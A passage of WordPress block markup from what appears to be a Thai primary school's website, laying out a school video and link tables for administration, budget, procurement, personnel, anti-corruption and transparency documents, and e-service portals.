data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\" data-type=\"link\" data-id=\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery 